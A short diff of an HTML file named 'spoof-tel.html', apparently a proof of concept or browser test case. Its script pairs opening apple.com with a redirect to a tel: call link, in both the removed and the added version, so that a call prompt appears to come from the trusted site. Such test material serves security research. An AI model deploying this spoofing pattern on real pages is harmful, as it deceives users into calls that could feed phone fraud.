--- a/spoof-tel.html
+++ b/spoof-tel.html
@@ -1,1 +1,4 @@
-<script>function y(){window.open('https://www.apple.com/contact/','_blank');setTimeout(function(){window.location.href='tel:+12505555555;1234#';},500);}setTimeout(y,1); </script>
+<script>  
+location.href="tel:1111"  
+setTimeout('window.open("https://apple.com")', 500)  
+</script>  
